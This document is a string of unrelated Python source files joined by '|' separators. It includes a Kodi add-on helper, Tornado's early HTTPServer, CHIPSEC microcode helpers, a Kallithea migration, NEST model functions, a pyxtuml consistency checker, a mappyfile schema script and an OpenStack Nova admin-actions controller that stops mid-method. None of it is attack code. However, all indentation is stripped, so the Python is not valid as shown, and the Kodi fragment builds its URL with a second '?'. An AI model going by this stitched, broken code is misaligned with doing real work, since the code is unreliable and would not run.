def addSearchDir(name,url, mode,iconimage):
#thumbnail = 'DefaultPlaylist.png'
u = sys.argv[0]+"?url="+urllib.quote_plus(url) + "?mode=" + str(mode)
liz = xbmcgui.ListItem(name, iconImage=iconimage, thumbnailImage=iconimage)
liz.setProperty('fanart_image', fanartimage)
xbmcplugin.addDirectoryItem(handle = int(sys.argv[1]), url = u, listitem = liz, isFolder = False)
|
#!/usr/bin/env python
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""A non-blocking, single-threaded HTTP server."""
import cgi
import errno
import fcntl
import functools
import ioloop
import iostream
import logging
import socket
import time
import urlparse
class HTTPServer(object):
"""A non-blocking, single-threaded HTTP server.
A server is defined by a request callback that takes an HTTPRequest
instance as an argument and writes a valid HTTP response with
request.write(). request.finish() finishes the request (but does not
necessarily close the connection in the case of HTTP/1.1 keep-alive
requests). A simple example server that echoes back the URI you
requested:
import httpserver
import ioloop
def handle_request(request):
message = "You requested %s\n" % request.uri
request.write("HTTP/1.1 200 OK\r\nContent-Length: %d\r\n\r\n%s" % (
len(message), message))
request.finish()
http_server = httpserver.HTTPServer(handle_request)
http_server.listen(8888)
ioloop.IOLoop.instance().start()
HTTPServer is a very basic connection handler. Beyond parsing the
HTTP request body and headers, the only HTTP semantics implemented
in HTTPServer is HTTP/1.1 keep-alive connections. We do not, however,
implement chunked encoding, so the request callback must provide a
Content-Length header or implement chunked encoding for HTTP/1.1
requests for the server to run correctly for HTTP/1.1 clients. If
the request handler is unable to do this, you can provide the
no_keep_alive argument to the HTTPServer constructor, which will
ensure the connection is closed on every request no matter what HTTP
version the client is using.
If xheaders is True, we support the X-Real-Ip and X-Scheme headers,
which override the remote IP and HTTP scheme for all requests. These
headers are useful when running Tornado behind a reverse proxy or
load balancer.
"""
def __init__(self, request_callback, no_keep_alive=False, io_loop=None,
xheaders=False):
self.request_callback = request_callback
self.no_keep_alive = no_keep_alive
self.io_loop = io_loop or ioloop.IOLoop.instance()
self.xheaders = xheaders
self._socket = None
def listen(self, port):
assert not self._socket
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
flags = fcntl.fcntl(self._socket.fileno(), fcntl.F_GETFD)
flags |= fcntl.FD_CLOEXEC
fcntl.fcntl(self._socket.fileno(), fcntl.F_SETFD, flags)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.setblocking(0)
self._socket.bind(("", port))
self._socket.listen(128)
self.io_loop.add_handler(self._socket.fileno(), self._handle_events,
self.io_loop.READ)
def _handle_events(self, fd, events):
while True:
try:
connection, address = self._socket.accept()
except socket.error, e:
if e[0] in (errno.EWOULDBLOCK, errno.EAGAIN):
return
raise
try:
stream = iostream.IOStream(connection, io_loop=self.io_loop)
HTTPConnection(stream, address, self.request_callback,
self.no_keep_alive, self.xheaders)
except:
logging.error("Error in connection callback", exc_info=True)
class HTTPConnection(object):
"""Handles a connection to an HTTP client, executing HTTP requests.
We parse HTTP headers and bodies, and execute the request callback
    until the HTTP connection is closed.
"""
def __init__(self, stream, address, request_callback, no_keep_alive=False,
xheaders=False):
self.stream = stream
self.address = address
self.request_callback = request_callback
self.no_keep_alive = no_keep_alive
self.xheaders = xheaders
self._request = None
self._request_finished = False
self.stream.read_until("\r\n\r\n", self._on_headers)
def write(self, chunk):
assert self._request, "Request closed"
self.stream.write(chunk, self._on_write_complete)
def finish(self):
assert self._request, "Request closed"
self._request_finished = True
if not self.stream.writing():
self._finish_request()
def _on_write_complete(self):
if self._request_finished:
self._finish_request()
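    # Keep-alive decision: HTTP/1.1 requests stay open unless the client sent
    # "Connection: close"; HTTP/1.0 requests stay open only when the client sent
    # "Connection: Keep-Alive" and the request length was determinate (Content-Length
    # present, or a bodyless HEAD/GET). no_keep_alive forces a close in every case.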
def _finish_request(self):
if self.no_keep_alive:
disconnect = True
else:
connection_header = self._request.headers.get("Connection")
if self._request.supports_http_1_1():
disconnect = connection_header == "close"
elif ("Content-Length" in self._request.headers
or self._request.method in ("HEAD", "GET")):
disconnect = connection_header != "Keep-Alive"
else:
disconnect = True
self._request = None
self._request_finished = False
if disconnect:
self.stream.close()
return
self.stream.read_until("\r\n\r\n", self._on_headers)
def _on_headers(self, data):
eol = data.find("\r\n")
start_line = data[:eol]
method, uri, version = start_line.split(" ")
if not version.startswith("HTTP/"):
raise Exception("Malformed HTTP version in HTTP Request-Line")
headers = HTTPHeaders.parse(data[eol:])
self._request = HTTPRequest(
connection=self, method=method, uri=uri, version=version,
headers=headers, remote_ip=self.address[0])
content_length = headers.get("Content-Length")
if content_length:
content_length = int(content_length)
if content_length > self.stream.max_buffer_size:
raise Exception("Content-Length too long")
if headers.get("Expect") == "100-continue":
self.stream.write("HTTP/1.1 100 (Continue)\r\n\r\n")
self.stream.read_bytes(content_length, self._on_request_body)
return
self.request_callback(self._request)
def _on_request_body(self, data):
self._request.body = data
content_type = self._request.headers.get("Content-Type", "")
if self._request.method == "POST":
if content_type.startswith("application/x-www-form-urlencoded"):
arguments = cgi.parse_qs(self._request.body)
for name, values in arguments.iteritems():
values = [v for v in values if v]
if values:
self._request.arguments.setdefault(name, []).extend(
values)
elif content_type.startswith("multipart/form-data"):
boundary = content_type[30:]
if boundary: self._parse_mime_body(boundary, data)
self.request_callback(self._request)
def _parse_mime_body(self, boundary, data):
if data.endswith("\r\n"):
footer_length = len(boundary) + 6
else:
footer_length = len(boundary) + 4
parts = data[:-footer_length].split("--" + boundary + "\r\n")
for part in parts:
if not part: continue
eoh = part.find("\r\n\r\n")
if eoh == -1:
logging.warning("multipart/form-data missing headers")
continue
headers = HTTPHeaders.parse(part[:eoh])
name_header = headers.get("Content-Disposition", "")
if not name_header.startswith("form-data;") or \
not part.endswith("\r\n"):
logging.warning("Invalid multipart/form-data")
continue
value = part[eoh + 4:-2]
name_values = {}
for name_part in name_header[10:].split(";"):
name, name_value = name_part.strip().split("=", 1)
name_values[name] = name_value.strip('"').decode("utf-8")
if not name_values.get("name"):
logging.warning("multipart/form-data value missing name")
continue
name = name_values["name"]
if name_values.get("filename"):
ctype = headers.get("Content-Type", "application/unknown")
self._request.files.setdefault(name, []).append(dict(
filename=name_values["filename"], body=value,
content_type=ctype))
else:
self._request.arguments.setdefault(name, []).append(value)
class HTTPRequest(object):
"""A single HTTP request.
GET/POST arguments are available in the arguments property, which
    maps argument names to lists of values (to support multiple values
    for individual names). Names and values are always unicode.
    File uploads are available in the files property, which maps file
    names to lists of files. Each file is a dictionary of the form
{"filename":..., "content_type":..., "body":...}. The content_type
comes from the provided HTTP header and should not be trusted
outright given that it can be easily forged.
An HTTP request is attached to a single HTTP connection, which can
be accessed through the "connection" attribute. Since connections
are typically kept open in HTTP/1.1, multiple requests can be handled
sequentially on a single connection.
"""
def __init__(self, method, uri, version="HTTP/1.0", headers=None,
body=None, remote_ip=None, protocol=None, host=None,
files=None, connection=None):
self.method = method
self.uri = uri
self.version = version
self.headers = headers or HTTPHeaders()
self.body = body or ""
if connection and connection.xheaders:
self.remote_ip = headers.get("X-Real-Ip", remote_ip)
self.protocol = headers.get("X-Scheme", protocol) or "http"
else:
self.remote_ip = remote_ip
self.protocol = protocol or "http"
self.host = host or headers.get("Host") or "127.0.0.1"
self.files = files or {}
self.connection = connection
self._start_time = time.time()
self._finish_time = None
scheme, netloc, path, query, fragment = urlparse.urlsplit(uri)
self.path = path
self.query = query
arguments = cgi.parse_qs(query)
self.arguments = {}
for name, values in arguments.iteritems():
values = [v for v in values if v]
if values: self.arguments[name] = values
def supports_http_1_1(self):
"""Returns True if this request supports HTTP/1.1 semantics"""
return self.version == "HTTP/1.1"
def write(self, chunk):
"""Writes the given chunk to the response stream."""
assert isinstance(chunk, str)
self.connection.write(chunk)
def finish(self):
"""Finishes this HTTP request on the open connection."""
self.connection.finish()
self._finish_time = time.time()
def full_url(self):
"""Reconstructs the full URL for this request."""
return self.protocol + "://" + self.host + self.uri
def request_time(self):
"""Returns the amount of time it took for this request to execute."""
if self._finish_time is None:
return time.time() - self._start_time
else:
return self._finish_time - self._start_time
def __repr__(self):
attrs = ("protocol", "host", "method", "uri", "version", "remote_ip",
"remote_ip", "body")
args = ", ".join(["%s=%r" % (n, getattr(self, n)) for n in attrs])
return "%s(%s, headers=%s)" % (
self.__class__.__name__, args, dict(self.headers))
class HTTPHeaders(dict):
"""A dictionary that maintains Http-Header-Case for all keys."""
def __setitem__(self, name, value):
dict.__setitem__(self, self._normalize_name(name), value)
def __getitem__(self, name):
return dict.__getitem__(self, self._normalize_name(name))
def _normalize_name(self, name):
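        # e.g. "content-type" becomes "Content-Type"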
return "-".join([w.capitalize() for w in name.split("-")])
@classmethod
def parse(cls, headers_string):
headers = cls()
for line in headers_string.splitlines():
if line:
name, value = line.split(": ", 1)
headers[name] = value
return headers
|
#!/usr/bin/python
#CHIPSEC: Platform Security Assessment Framework
#Copyright (c) 2010-2015, Intel Corporation
#
#This program is free software; you can redistribute it and/or
#modify it under the terms of the GNU General Public License
#as published by the Free Software Foundation; Version 2.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
#Contact information:
#[email protected]
#
# -------------------------------------------------------------------------------
#
# CHIPSEC: Platform Hardware Security Assessment Framework
# (c) 2010-2012 Intel Corporation
#
# -------------------------------------------------------------------------------
"""
Microcode update specific functionality (for each CPU thread)
usage:
>>> ucode_update_id( 0 )
>>> load_ucode_update( 0, ucode_buf )
>>> update_ucode_all_cpus( 'ucode.pdb' )
>>> dump_ucode_update_header( 'ucode.pdb' )
"""
import os
import struct
import sys
from chipsec.logger import *
from chipsec.hal.physmem import *
from chipsec.hal.msr import *
from chipsec.file import *
IA32_MSR_BIOS_UPDT_TRIG = 0x79
IA32_MSR_BIOS_SIGN_ID = 0x8B
IA32_MSR_BIOS_SIGN_ID_STATUS = 0x1
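# Writing IA32_BIOS_UPDT_TRIG (0x79) with the linear address of the update data
# triggers a microcode load; IA32_BIOS_SIGN_ID (0x8B) then reports the loaded
# microcode update ID in its upper 32 bits.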
from collections import namedtuple
class UcodeUpdateHeader( namedtuple('UcodeUpdateHeader', 'header_version update_revision date processor_signature checksum loader_revision processor_flags data_size total_size reserved1 reserved2 reserved3') ):
__slots__ = ()
def __str__(self):
return """
Microcode Update Header
--------------------------------
Header Version : 0x%08X
Update Revision : 0x%08X
Date : 0x%08X
Processor Signature : 0x%08X
Checksum : 0x%08X
Loader Revision : 0x%08X
Processor Flags : 0x%08X
Update Data Size : 0x%08X
Total Size : 0x%08X
Reserved1 : 0x%08X
Reserved2 : 0x%08X
Reserved3 : 0x%08X
""" % ( self.header_version, self.update_revision, self.date, self.processor_signature, self.checksum, self.loader_revision, self.processor_flags, self.data_size, self.total_size, self.reserved1, self.reserved2, self.reserved3 )
UCODE_HEADER_SIZE = 0x30
def dump_ucode_update_header( pdb_ucode_buffer ):
ucode_header = UcodeUpdateHeader( *struct.unpack_from( '12I', pdb_ucode_buffer ) )
print ucode_header
return ucode_header
def read_ucode_file( ucode_filename ):
ucode_buf = read_file( ucode_filename )
if (ucode_filename.endswith('.pdb')):
if logger().VERBOSE:
logger().log( "[ucode] PDB file '%.256s' has ucode update header (size = 0x%X)" % (ucode_filename, UCODE_HEADER_SIZE) )
dump_ucode_update_header( ucode_buf )
return ucode_buf[UCODE_HEADER_SIZE:]
else:
return ucode_buf
class Ucode:
def __init__( self, cs ):
self.helper = cs.helper
self.cs = cs
# @TODO remove later/replace with msr.get_cpu_thread_count()
def get_cpu_thread_count( self ):
(core_thread_count, dummy) = self.helper.read_msr( 0, Cfg.IA32_MSR_CORE_THREAD_COUNT )
return (core_thread_count & Cfg.IA32_MSR_CORE_THREAD_COUNT_THREADCOUNT_MASK)
def ucode_update_id(self, cpu_thread_id):
#self.helper.write_msr( cpu_thread_id, IA32_MSR_BIOS_SIGN_ID, 0, 0 )
#self.helper.cpuid( cpu_thread_id, 0 )
(bios_sign_id_lo, bios_sign_id_hi) = self.helper.read_msr( cpu_thread_id, IA32_MSR_BIOS_SIGN_ID )
ucode_update_id = bios_sign_id_hi
if (bios_sign_id_lo & IA32_MSR_BIOS_SIGN_ID_STATUS):
if logger().VERBOSE: logger().log( "[ucode] CPU%d: last Microcode update failed (current microcode id = 0x%08X)" % (cpu_thread_id, ucode_update_id) )
else:
if logger().VERBOSE: logger().log( "[ucode] CPU%d: Microcode update ID = 0x%08X" % (cpu_thread_id, ucode_update_id) )
return ucode_update_id
def update_ucode_all_cpus(self, ucode_file ):
if not ( os.path.exists(ucode_file) and os.path.isfile(ucode_file) ):
logger().error( "Ucode file not found: '%.256s'" % ucode_file )
return False
ucode_buf = read_ucode_file( ucode_file )
if (ucode_buf is not None) and (len(ucode_buf) > 0):
for tid in range(self.get_cpu_thread_count()):
self.load_ucode_update( tid, ucode_buf )
return True
def update_ucode(self, cpu_thread_id, ucode_file ):
if not ( os.path.exists(ucode_file) and os.path.isfile(ucode_file) ):
logger().error( "Ucode file not found: '%.256s'" % ucode_file )
return False
_ucode_buf = read_ucode_file( ucode_file )
return self.load_ucode_update( cpu_thread_id, _ucode_buf )
def load_ucode_update(self, cpu_thread_id, ucode_buf ):
if logger().HAL: logger().log( "[ucode] loading microcode update on CPU%d" % cpu_thread_id )
self.helper.load_ucode_update( cpu_thread_id, ucode_buf )
return self.ucode_update_id( cpu_thread_id )
|
import logging
from sqlalchemy import *
from kallithea.lib.dbmigrate.migrate import *
from kallithea.lib.dbmigrate.migrate.changeset import *
log = logging.getLogger(__name__)
def upgrade(migrate_engine):
"""
Upgrade operations go here.
Don't create your own engine; bind migrate_engine to your metadata
"""
#==========================================================================
# CHANGESET_COMMENTS
#==========================================================================
from kallithea.lib.dbmigrate.schema.db_1_4_0 import ChangesetComment
tbl_name = ChangesetComment.__tablename__
tbl = Table(tbl_name,
MetaData(bind=migrate_engine), autoload=True,
autoload_with=migrate_engine)
col = tbl.columns.revision
    # make the revision field nullable
col.alter(nullable=True)
#==========================================================================
# REPOSITORY
#==========================================================================
from kallithea.lib.dbmigrate.schema.db_1_4_0 import Repository
tbl = Repository.__table__
updated_on = Column('updated_on', DateTime(timezone=False),
nullable=True, unique=None)
    # create the updated_on column for the future lightweight main page
updated_on.create(table=tbl)
def downgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
|
# -*- coding: utf-8 -*-
#
# hl_api_models.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
"""
Functions for model handling
"""
from .hl_api_helper import *
@check_stack
def Models(mtype="all", sel=None):
"""Return a tuple of all available model (neurons, devices and
synapses) names, sorted by name.
Parameters
----------
mtype : str, optional
Use mtype='nodes' to only see neuron and device models,
or mtype='synapses' to only see synapse models.
sel : str, optional
String used to filter the result list and only return models
containing it.
Returns
-------
tuple:
Available model names
Notes
-----
- Synapse model names ending with '_hpc' provide minimal memory
requirements by using thread-local target neuron IDs and fixing
the `rport` to 0.
    - Synapse model names ending with '_lbl' allow assigning an individual
integer label (`synapse_label`) to created synapses at the cost
of increased memory requirements.
Raises
------
ValueError
        If mtype is not one of 'all', 'nodes' or 'synapses'.
"""
if mtype not in ("all", "nodes", "synapses"):
raise ValueError("type has to be one of 'all', 'nodes' or 'synapses'")
models = []
if mtype in ("all", "nodes"):
sr("modeldict")
models += spp().keys()
if mtype in ("all", "synapses"):
sr("synapsedict")
models += spp().keys()
if sel is not None:
models = [x for x in models if x.find(sel) >= 0]
models.sort()
return tuple(models)
@check_stack
def ConnectionRules():
"""Return a typle of all available connection rules, sorted by name.
Returns
-------
tuple:
Available connection rules
"""
sr('connruledict')
return tuple(sorted(spp().keys()))
@check_stack
def SetDefaults(model, params, val=None):
"""Set the default parameters of the given model to the values
specified in the params dictionary.
New default values are used for all subsequently created instances
of the model.
Parameters
----------
model : str
Name of the model
params : str or dict
Dictionary of new default values. If val is given, this has to
be the name of a model property as a str.
val : str, optional
If given, params has to be the name of a model property.
"""
if val is not None:
if is_literal(params):
params = {params: val}
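    # push the parameter dictionary on the SLI stack, then run
    # "/<model> exch SetDefaults" in the interpreter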
sps(params)
sr('/{0} exch SetDefaults'.format(model))
@check_stack
def GetDefaults(model, keys=None):
"""Return a dictionary with the default parameters of the given
model, specified by a string.
Parameters
----------
model : str
Name of the model
keys : str or list, optional
String or a list of strings naming model properties. GetDefaults then
returns a single value or a list of values belonging to the keys
given.
Returns
-------
dict:
All default parameters
type:
        If keys is a string, the corresponding default parameter is returned
    list:
        If keys is a list of strings, a list of corresponding default parameters
is returned
Raises
------
TypeError
Examples
--------
GetDefaults('iaf_psc_alpha','V_m') -> -70.0
GetDefaults('iaf_psc_alpha',['V_m', 'model']) -> [-70.0, 'iaf_psc_alpha']
"""
if keys is None:
cmd = "/{0} GetDefaults".format(model)
elif is_literal(keys):
cmd = '/{0} GetDefaults /{1} get'.format(model, keys)
elif is_iterable(keys):
keys_str = " ".join("/{0}".format(x) for x in keys)
cmd = "/{0} GetDefaults [ {1} ] {{ 1 index exch get }}"\
.format(model, keys_str) + " Map exch pop"
else:
raise TypeError("keys should be either a string or an iterable")
sr(cmd)
return spp()
@check_stack
def CopyModel(existing, new, params=None):
"""Create a new model by copying an existing one.
Parameters
----------
existing : str
Name of existing model
new : str
Name of the copy of the existing model
params : dict, optional
Default parameters assigned to the copy. Not provided parameters are
taken from the existing model.
"""
model_deprecation_warning(existing)
if params is not None:
sps(params)
sr("/%s /%s 3 2 roll CopyModel" % (existing, new))
else:
sr("/%s /%s CopyModel" % (existing, new))
|
# encoding: utf-8
# Copyright (C) 2017 John Törnblom
#
# This file is part of pyxtuml.
#
# pyxtuml is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# pyxtuml is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with pyxtuml. If not, see <http://www.gnu.org/licenses/>.
'''
Check an xtuml model for association constraint violations in its metamodel.
'''
import logging
import optparse
import sys
import xtuml
logger = logging.getLogger('consistency_check')
def pretty_to_link(inst, link):
'''
Create a human-readable representation of a link on the 'TO'-side
'''
values = ''
prefix = ''
metaclass = xtuml.get_metaclass(inst)
for name, ty in metaclass.attributes:
if name in link.key_map:
value = getattr(inst, name)
value = xtuml.serialize_value(value, ty)
name = link.key_map[name]
values += '%s%s=%s' % (prefix, name, value)
prefix = ', '
return '%s(%s)' % (link.kind, values)
def pretty_from_link(inst, link):
'''
Create a human-readable representation of a link on the 'FROM'-side
'''
values = ''
prefix = ''
metaclass = xtuml.get_metaclass(inst)
for name, ty in metaclass.attributes:
if name in link.key_map:
value = getattr(inst, name)
value = xtuml.serialize_value(value, ty)
values += '%s%s=%s' % (prefix, name, value)
prefix = ', '
return '%s(%s)' % (metaclass.kind, values)
def pretty_unique_identifier(inst, identifier):
'''
    Create a human-readable representation of a unique identifier.
'''
values = ''
prefix = ''
metaclass = xtuml.get_metaclass(inst)
for name, ty in metaclass.attributes:
if name in metaclass.identifying_attributes:
value = getattr(inst, name)
value = xtuml.serialize_value(value, ty)
values += '%s%s=%s' % (prefix, name, value)
prefix = ', '
return '%s(%s)' % (identifier, values)
def check_uniqueness_constraint(m, kind=None):
'''
Check the model for uniqueness constraint violations.
'''
if kind is None:
metaclasses = m.metaclasses.values()
else:
metaclasses = [m.find_metaclass(kind)]
res = 0
for metaclass in metaclasses:
id_map = dict()
for identifier in metaclass.indices:
id_map[identifier] = dict()
for inst in metaclass.select_many():
# Check for null-values
for name, ty in metaclass.attributes:
if name not in metaclass.identifying_attributes:
continue
value = getattr(inst, name)
isnull = value is None
isnull |= (ty == 'UNIQUE_ID' and not value)
if isnull:
res += 1
logger.warning('%s.%s is part of an identifier and is null'
% (metaclass.kind, name))
# Check uniqueness
for identifier in metaclass.indices:
kwargs = dict()
for name in metaclass.indices[identifier]:
kwargs[name] = getattr(inst, name)
index_key = frozenset(kwargs.items())
if index_key in id_map[identifier]:
res += 1
id_string = pretty_unique_identifier(inst, identifier)
logger.warning('uniqueness constraint violation in %s, %s'
% (metaclass.kind, id_string))
id_map[identifier][index_key] = inst
return res
def check_link_integrity(m, link):
'''
Check the model for integrity violations on an association in a particular direction.
'''
res = 0
for inst in link.from_metaclass.select_many():
q_set = list(link.navigate(inst))
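        # an unconditional link must navigate to at least one instance, and a
        # single-valued link to at most one; anything else is a violation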
        if (len(q_set) < 1 and not link.conditional) or (
                len(q_set) > 1 and not link.many):
res += 1
logger.warning('integrity violation in '
'%s --(%s)--> %s' % (pretty_from_link(inst, link),
link.rel_id,
pretty_to_link(inst, link)))
return res
def check_subtype_integrity(m, super_kind, rel_id):
'''
Check the model for integrity violations across a subtype association.
'''
if isinstance(rel_id, int):
rel_id = 'R%d' % rel_id
res = 0
for inst in m.select_many(super_kind):
if not xtuml.navigate_subtype(inst, rel_id):
res += 1
logger.warning('integrity violation across '
'%s[%s]' % (super_kind, rel_id))
return res
def check_association_integrity(m, rel_id=None):
'''
Check the model for integrity violations on association(s).
'''
if isinstance(rel_id, int):
rel_id = 'R%d' % rel_id
res = 0
for ass in m.associations:
if rel_id in [ass.rel_id, None]:
res += check_link_integrity(m, ass.source_link)
res += check_link_integrity(m, ass.target_link)
return res
def main(args):
parser = optparse.OptionParser(usage="%prog [options] <sql_file> [another_sql_file...].",
version=xtuml.version.complete_string,
formatter=optparse.TitledHelpFormatter())
parser.set_description(__doc__.strip())
parser.add_option("-r", "-R", dest="rel_ids", type='int', metavar="<number>",
help="limit consistency check to one or more associations",
action="append", default=[])
parser.add_option("-k", dest="kinds", type='string', metavar="<key letter>",
help="limit check for uniqueness constraint violations to one or more classes",
action="append", default=[])
parser.add_option("-v", "--verbosity", dest='verbosity', action="count",
help="increase debug logging level", default=1)
(opts, args) = parser.parse_args(args)
if len(args) == 0:
parser.print_help()
sys.exit(1)
levels = {
0: logging.ERROR,
1: logging.WARNING,
2: logging.INFO,
3: logging.DEBUG,
}
logging.basicConfig(level=levels.get(opts.verbosity, logging.DEBUG))
loader = xtuml.ModelLoader()
for filename in args:
loader.filename_input(filename)
m = loader.build_metamodel()
error = 0
for rel_id in opts.rel_ids:
error += xtuml.check_association_integrity(m, rel_id)
if not opts.rel_ids:
error += xtuml.check_association_integrity(m)
for kind in opts.kinds:
error += xtuml.check_uniqueness_constraint(m, kind)
if not opts.kinds:
error += xtuml.check_uniqueness_constraint(m)
return error
if __name__ == '__main__':
num_errors = main(sys.argv[1:])
sys.exit(num_errors > 0)
|
"""
jsonref
Docs
C:\VirtualEnvs\mappyfile\Scripts\activate.bat
SET "input_folder=D:\GitHub\mappyfile\mappyfile\schemas"
SET "output_folder=D:\GitHub\mappyfile\docs\schemas\"
jsonschema2rst %input_folder% %output_folder%
"""
import os
from pprint import pprint
import jsonref
from jsonref import JsonRef
def get_full_schema(schema_dir):
print(schema_dir)
os.chdir(schema_dir)
fn = "map.json"
uri = "file:///{}/".format(schema_dir)
with open(fn) as f:
j = jsonref.load(f, base_uri=uri)
    full_schema = jsonref.dumps(j, indent=4, sort_keys=False)
with open(r"C:\Temp\mapfile.json", "w") as f:
f.write(full_schema)
return full_schema
# create_versioned_schema
def update_schema(obj, bad):
    """Recursively remove every key or list entry equal to `bad` from the
    dereferenced schema structure."""
    if isinstance(obj, dict):
        for k in list(obj.keys()):
            if k == bad:
                del obj[k]
            else:
                update_schema(obj[k], bad)
    elif isinstance(obj, list):
        for i in reversed(range(len(obj))):
            if obj[i] == bad:
                del obj[i]
            else:
                update_schema(obj[i], bad)
    else:
        # neither a dict nor a list, do nothing
        pass
def main(schema_dir, key_to_remove=None):
    full_schema = get_full_schema(schema_dir)
    if key_to_remove is not None:
        # update_schema works on the parsed structure and needs the key to
        # strip; the original script does not specify it, so it is optional here
        update_schema(jsonref.loads(full_schema), key_to_remove)
if __name__ == "__main__":
project_dir = os.path.dirname(os.path.dirname(__file__))
schema_dir = os.path.join(project_dir, "mappyfile", "schemas")
main(schema_dir)
print("Done!")
|
# Copyright 2011 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os.path
import traceback
from oslo.utils import strutils
import six
import webob
from webob import exc
from nova.api.openstack import common
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova import compute
from nova.compute import vm_states
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.openstack.common import log as logging
LOG = logging.getLogger(__name__)
# States usable in resetState action
state_map = dict(active=vm_states.ACTIVE, error=vm_states.ERROR)
def authorize(context, action_name):
action = 'admin_actions:%s' % action_name
extensions.extension_authorizer('compute', action)(context)
class AdminActionsController(wsgi.Controller):
def __init__(self, *args, **kwargs):
super(AdminActionsController, self).__init__(*args, **kwargs)
self.compute_api = compute.API()
# TODO(bcwaldon): These action names should be prefixed with 'os-'
@wsgi.action('pause')
def _pause(self, req, id, body):
"""Permit Admins to pause the server."""
ctxt = req.environ['nova.context']
authorize(ctxt, 'pause')
server = common.get_instance(self.compute_api, ctxt, id,
want_objects=True)
try:
self.compute_api.pause(ctxt, server)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'pause', id)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::pause %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('unpause')
def _unpause(self, req, id, body):
"""Permit Admins to unpause the server."""
ctxt = req.environ['nova.context']
authorize(ctxt, 'unpause')
server = common.get_instance(self.compute_api, ctxt, id,
want_objects=True)
try:
self.compute_api.unpause(ctxt, server)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'unpause', id)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("Compute.api::unpause %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('suspend')
def _suspend(self, req, id, body):
"""Permit admins to suspend the server."""
context = req.environ['nova.context']
authorize(context, 'suspend')
server = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
self.compute_api.suspend(context, server)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'suspend', id)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("compute.api::suspend %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('resume')
def _resume(self, req, id, body):
"""Permit admins to resume the server from suspend."""
context = req.environ['nova.context']
authorize(context, 'resume')
server = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
self.compute_api.resume(context, server)
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'resume', id)
except exception.InstanceNotFound:
msg = _("Server not found")
raise exc.HTTPNotFound(explanation=msg)
except Exception:
readable = traceback.format_exc()
LOG.exception(_LE("compute.api::resume %s"), readable)
raise exc.HTTPUnprocessableEntity()
return webob.Response(status_int=202)
@wsgi.action('migrate')
def _migrate(self, req, id, body):
"""Permit admins to migrate a server to a new host."""
context = req.environ['nova.context']
authorize(context, 'migrate')
instance = common.get_instance(self.compute_api, context, id,
want_objects=True)
try:
self.compute_api.resize(req.environ['nova.context'], instance)
except exception.QuotaError as error:
raise exc.HTTPForbidden(explanation=error.format_message())
except exception.InstanceIsLocked as e:
raise exc.HTTPConflict(explanation=e.format_message())
except exception.InstanceInvalidState as state_error:
common.raise_http_conflict_for_instance_invalid_state(state_error,
'migrate', id)
except exception.InstanceNotFound as e:
raise exc.HTTPNotFound(explanation=e.format_message())
except exception.NoValidHost as e:
